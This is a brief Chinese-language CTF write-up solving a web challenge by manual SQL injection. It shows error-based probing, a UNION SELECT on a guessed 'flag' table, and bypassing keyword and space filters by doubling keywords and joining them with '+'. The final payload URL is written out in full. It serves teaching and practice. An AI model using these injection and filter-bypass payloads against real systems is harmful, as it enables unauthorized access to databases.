这题比较简单,我们就直接手工注入了
这里给大家推荐一个火狐插件hackbar,在做web题的时候还是挺好用的
下面开始介绍手工的流程:
1)输入1,提交,不报错
2)输入1‘,提交,报错,判断存在注入。
3)根据同类型题目的经验,初步预计后台表为flag,字段名为flag,需要构造union select flag from flag
4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,所以语句为:1‘ union select flag from flag where ‘t’=’t
执行后报错:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
结论:根据错误信息发现只有变量了,其他的关键字都被过滤了。
5)把关键字写2遍提交,报错: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
结论:空格被过滤
6)于是我们使用+号在空格之前连接:
http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t
即可得到flag